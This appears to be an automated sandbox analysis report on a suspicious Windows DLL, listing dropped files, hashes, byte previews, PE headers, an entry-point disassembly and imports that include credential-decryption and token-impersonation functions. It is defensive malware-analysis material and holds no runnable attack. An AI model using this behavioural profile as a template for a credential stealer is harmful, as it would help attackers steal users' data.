                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):751624
                                                                                                                                                                                              Entropy (8bit):4.941596949315087
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                                                              MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                                                              SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                                                              SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                                                              SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):95768
                                                                                                                                                                                              Entropy (8bit):7.997854613320056
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:1536:Bd+YwYDCNhjdns6x54BCtKb8UEwZ0HgJXZBf6JtVWuU+drQsfH5XLwe2RoTX:Bd+KDOxnKKwDBeV6ArQqZMeAoTX
                                                                                                                                                                                              MD5:10EDBBE0FBAA0734001EFAFB67EAC429
                                                                                                                                                                                              SHA1:7F1296CAE3164B56F9556A86564C39007C43B0EF
                                                                                                                                                                                              SHA-256:70400006878174AB5C056390FABFC6BA2594B1391EFBF0E96A203D6B7517C0A4
                                                                                                                                                                                              SHA-512:5E0E4953B441AE5C01863F88CC1E5D01229C812995148C64D6AB4CCD48416F1667FDA52554BAD609483B71B66372D7F177804EECABFADB6D73FF7543E7539E4E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:PK..-......9.Z.8n~............D/hwcompat.txt.....x......Zu.......P&......K.k..4....4.."J.~....;.......t.Z9.d.hm...q.:9.'M...q.49 *xY...../6o.b..J...<.'....q.vF....Xv~.'...9....[.`..p....t.t..q8.#:../_.R.,...i.0..#.....HV{k7.j;.Y.U.}.t..K.'./..%...s}hs....<.:.+$.*....#..,....v....&S...^. m..3.^...L...V....u.....yW....XSCf..%.N./.>.O...EO3k=*^.~.|/.#..7..H..C.T.. Y@.CL.S.3X...q"[._.Q,.=1.J.....W.z.<?6...)..~.cO.4..:.....fj....whQ.\..,Q.%...@v..dL'..".{..mY=.n.%.~2.35(....iT..c.......-.J......,..{.7r.....&q.c.U....*..K_.)...s..:.6.6.d.\rR.....2......'.q..x.........b."H^.8...R....Kk>....{}....8.;.......)-...$..*..A.M..P.8..Srt...X..`....@.U7..#.2...$....?I.EP..'..4.t5...d....W...-.......;.V..A&W...fF^P.g}.{..s.o...0EA.a.......3.#.(.F4..c<.OL.'P..i.\!. t'.....!..E,E.R.:.K.HC.=..Z.......{_.c.<g..0...z......68.qM..,...e...a....).._.E.j`e.+....0.k.4.\l...%...v....|.. y..Z2+..J.:.D...rS...)o.9...Gv....s/..h.\..u.1.<..e:......O....W".A..@.}.z
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                              Entropy (8bit):0.7403664744478247
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:FiWXlv9U:Lv
                                                                                                                                                                                              MD5:99BBE027A67D5B8E84C910F7C77709D2
                                                                                                                                                                                              SHA1:372EFA7431F8EECFC4247C810131CB6928E50AC3
                                                                                                                                                                                              SHA-256:0F27051CF1DA3BBA983425A45ED2DE291E43491E0A982844D92C5B92AF34FCAE
                                                                                                                                                                                              SHA-512:E3970DEFF941FE95016F731651C7C234FF4AD27B54317BE44B4292F050E2A4B9ACACFF103837ADFC94999F9B534098231204C26D9BBDF47412CFE09C50F77BE7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:sdPC......................5.y&.K.?....................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):59
                                                                                                                                                                                              Entropy (8bit):4.348685533022555
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:gQISuy/+Y1qUPDYQn:gQI54YUPDYQ
                                                                                                                                                                                              MD5:95AA302B9DA89C2E4152C2C3AAD803D2
                                                                                                                                                                                              SHA1:AA77D89C5403BB33D9F0E9B5E309037FEE67CB9D
                                                                                                                                                                                              SHA-256:BCADA32FD456E4507377443AD6947D78FB8932CB0BA248F9BDF95C88B864DB72
                                                                                                                                                                                              SHA-512:DD57ADC9A9F7582C99196BC74249AABEED2333F671F354E968F9D3A123B860BD94941FF975F7B05FBDD6EF22F7C207EC626EF7099E3FCDC60183E4B88247454F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:9487./devtools/browser/e8e712cf-fd86-4b58-bf59-1ef93e6f1bb5
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1780736
                                                                                                                                                                                              Entropy (8bit):6.54388973247121
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:izDLT7eXc2a+xMPDBsvh58j6OQ/K4eSlrIBizB2J4bJGtpxnvUmhEocQ0x58:iTTXkMPDjj6O0d1Z9sxnvU3Z
                                                                                                                                                                                              MD5:B1A10828FADDCB586CC3A9C7A01CBBBF
                                                                                                                                                                                              SHA1:1D7EF8581F731D77C9621045C0F2712D654EBEF0
                                                                                                                                                                                              SHA-256:1D2D090188CD500EB6098701690A72F090440162A651123EAB44132525597446
                                                                                                                                                                                              SHA-512:12171C09B03BB2E163561B9B7618B3EC8566D3162A2472A63661A1F86F26118272F3A7C6608C09640D57D992DE52A840DEB41B5EB089E19D35E45D08492ACACF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: e0691gXIKs.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: hJ1bl8p7dJ.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Y4TyDwQzbE.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: DYv2ldz5xT.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: rBFTGm5ioO.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: DYv2ldz5xT.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: rBFTGm5ioO.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: nNnzvybxiy.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: StL9joVVcT.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: #U2800.exe, Detection: malicious, Browse
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..B.........A......A......A...+..A............X...*..X......X...................N..........Rich...........................PE..d.....Xg.........." .....*................................................................`A.............................................$......(....`.......`..P............p...... _..T............................_..8............@...............................text....(.......*.................. ..`.rdata......@......................@..@.data............n..................@....pdata..P....`......."..............@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                              Entropy (8bit):4.466390787661656
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:rIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSb9:sXD94zWlLZMM6YFHa+9
                                                                                                                                                                                              MD5:F6445B67F4C0329085F7BBCC8C231E8F
                                                                                                                                                                                              SHA1:1F6B6CE0509535A80A7A71D7586350542E38903D
                                                                                                                                                                                              SHA-256:2AB3B6A6E01A3C9D616B63F7A27E886A72B2D7537EAD3FA8900A7CBDD1ECF6C5
                                                                                                                                                                                              SHA-512:5D37571CF77E4CF33A6B508B002410355FECF842159CE135BC943113C5EAB72724F2A94D10DDD40FBA765342CC7B3A32DD6A12F274B16CAE2553D16D1FDA8BD2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....}f..............................................................................................................................................................................................................................................................................................................................................E...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                              Entropy (8bit):6.9215087990179045
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                                                              File name:mP8rzGD7fG.dll
                                                                                                                                                                                              File size:26'218'512 bytes
                                                                                                                                                                                              MD5:32893397afbb3b64a7ad72505d57b2a2
                                                                                                                                                                                              SHA1:8d901669e2e7ed707de6f6b78783bdef94ca347e
                                                                                                                                                                                              SHA256:ebcb219cffe49e60fccfd0ea6f95feb5166751426e70faafcc328ed1903d6324
                                                                                                                                                                                              SHA512:0ac5e0c43b5717ffe70eddb5f7987044021282a6b4c6af8138024577c0cd124b46c9d12434100b06c1e30f66970d56a9534964bad92a7ca28be1b0eae0dde242
                                                                                                                                                                                              SSDEEP:393216:6BECfqcx7kwvzI25doyLhdYzXexvaNoXHjK:a4MxhdYzXexvAoT
                                                                                                                                                                                              TLSH:AA47AE14A3E80A66E5BB9734C575C232DAB1BD625731D60F254CF2891F73B818B2B732
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\aYg..74..74..74..45..74..35..74..25?.74.x.4..74j.65..74..64..74..45..74..35..74..74..74..25P.74..75..74..55..74Rich..74.......
                                                                                                                                                                                              Icon Hash:7ae282899bbab082
                                                                                                                                                                                              Entrypoint:0x180081be0
                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                              Imagebase:0x180000000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                              Time Stamp:0x677DF847 [Wed Jan 8 04:00:07 2025 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:4232f3ef80fc72e98eb20eb21622b405
                                                                                                                                                                                              Instruction
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov dword ptr [esp+08h], ebx
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov dword ptr [esp+10h], esi
                                                                                                                                                                                              push edi
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                              dec ecx
                                                                                                                                                                                              mov edi, eax
                                                                                                                                                                                              mov ebx, edx
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov esi, ecx
                                                                                                                                                                                              cmp edx, 01h
                                                                                                                                                                                              jne 00007F8A44D10447h
                                                                                                                                                                                              call 00007F8A44D10E18h
                                                                                                                                                                                              dec esp
                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                              mov edx, ebx
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ecx, esi
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ebx, dword ptr [esp+30h]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov esi, dword ptr [esp+38h]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add esp, 20h
                                                                                                                                                                                              pop edi
                                                                                                                                                                                              jmp 00007F8A44D102E0h
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              jmp 00007F8A44D110A8h
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                              call 00007F8A44D110A4h
                                                                                                                                                                                              jmp 00007F8A44D10444h
                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                              ret
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                              dec ebp
                                                                                                                                                                                              mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ecx, edx
                                                                                                                                                                                              dec ecx
                                                                                                                                                                                              mov edx, ecx
                                                                                                                                                                                              call 00007F8A44D10452h
                                                                                                                                                                                              mov eax, 00000001h
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                              ret
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              inc eax
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              inc ebp
                                                                                                                                                                                              mov ebx, dword ptr [eax]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ebx, edx
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              and ebx, FFFFFFF8h
                                                                                                                                                                                              dec esp
                                                                                                                                                                                              mov ecx, ecx
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              test byte ptr [eax], 00000004h
                                                                                                                                                                                              dec esp
                                                                                                                                                                                              mov edx, ecx
                                                                                                                                                                                              je 00007F8A44D10455h
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              mov eax, dword ptr [eax+08h]
                                                                                                                                                                                              dec ebp
                                                                                                                                                                                              arpl word ptr [eax+04h], dx
                                                                                                                                                                                              neg eax
                                                                                                                                                                                              dec esp
                                                                                                                                                                                              add edx, ecx
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              arpl ax, cx
                                                                                                                                                                                              dec esp
                                                                                                                                                                                              and edx, ecx
                                                                                                                                                                                              dec ecx
                                                                                                                                                                                              arpl bx, ax
                                                                                                                                                                                              dec edx
                                                                                                                                                                                              mov edx, dword ptr [eax+edx]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                              test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                              je 00007F8A44D1044Dh
                                                                                                                                                                                              movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                              and eax, FFFFFFF0h
                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x1bc7b900x68.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1bc7bf80x154.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1caf0000x398.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c0d0000xa1304.pdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cb00000x1fa8.reloc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1a761d00x54.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x1a764000x28.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1a760900x140.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xc340000xc70.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              .text0x10000x8f1580x8f200ce60a1f18440c89e81261bbdda780ac5False0.42795271561135373data6.675012123139781IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .managed0x910000x82a1780x82a20043b7b130895bb170b8742fbe400c5baaunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              hydrated0x8bc0000x377f700x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .rdata0xc340000xf9660a0xf9680029ef06c5b0df8a96a7210b1ed357f2c8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .data0x1bcb0000x419300xd8005ab71544b18948c91cc061c9e150f63dFalse0.2798936631944444data5.16678777217334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .pdata0x1c0d0000xa13040xa1400604077659270464ab488e28625d874c9False0.494069464631783data6.764961587293354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .rsrc0x1caf0000x3980x40065dd2aed131e9bc795f7bdd7d6b7f7f4False0.3837890625data3.0042443737151787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .reloc0x1cb00000x1fa80x2000e99f5b31aa97a1a2994404187a137473False0.2191162109375data5.4435770207253515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                              RT_VERSION0x1caf0580x340data0.42427884615384615
                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumKeyExW, RegEnumValueW, GetTokenInformation, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser
                                                                                                                                                                                              bcrypt.dllBCryptCreateHash, BCryptEncrypt, BCryptDestroyHash, BCryptDestroyKey, BCryptCloseAlgorithmProvider, BCryptSetProperty, BCryptOpenAlgorithmProvider, BCryptImportKeyPair, BCryptImportKey, BCryptHashData, BCryptGetProperty, BCryptFinishHash, BCryptExportKey, BCryptDecrypt, BCryptGenRandom
                                                                                                                                                                                              CRYPT32.dllCryptProtectData, CryptUnprotectData, CertFreeCertificateChainEngine, CertCloseStore, PFXImportCertStore, PFXExportCertStore, CryptFindOIDInfo, CryptQueryObject, CryptMsgGetParam, CryptMsgClose, CryptImportPublicKeyInfoEx2, CryptFormatObject, CryptDecodeObject, CertVerifyTimeValidity, CertSetCertificateContextProperty, CertSerializeCertificateStoreElement, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertGetCertificateContextProperty, CryptProtectMemory, CryptUnprotectMemory, CertAddCertificateContextToStore, CertAddCertificateLinkToStore, CertControlStore, CertCreateCertificateChainEngine, CertFindCertificateInStore, CertFindExtension, CertFreeCertificateChain, CertGetCertificateChain, CertGetIntendedKeyUsage, CertGetNameStringW, CertGetValidUsages, CertNameToStrW, CertOpenStore, CertSaveStore
                                                                                                                                                                                              IPHLPAPI.DLLGetAdaptersAddresses, GetPerAdapterInfo, GetNetworkParams, if_nametoindex
